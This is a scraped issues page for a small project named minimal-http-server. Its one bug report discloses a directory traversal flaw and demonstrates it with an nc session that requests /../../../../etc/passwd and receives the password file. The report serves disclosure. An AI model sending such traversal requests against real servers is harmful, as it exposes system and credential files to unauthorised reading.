minimal-http-server icon indicating copy to clipboard operation
minimal-http-server copied to clipboard

Basic http server

Results 1 minimal-http-server issues
Sort by recently updated
recently updated
newest added

It is possible to read every file on the system using ../ try: [cotix@lithium ~]$ nc localhost 8080 GET /../../../../../../../etc/passwd HTTP/1.0 HTTP/1.0 200 OK Content-Type: text/plain root: x:0:0:root:/root:/bin/bash ... rest...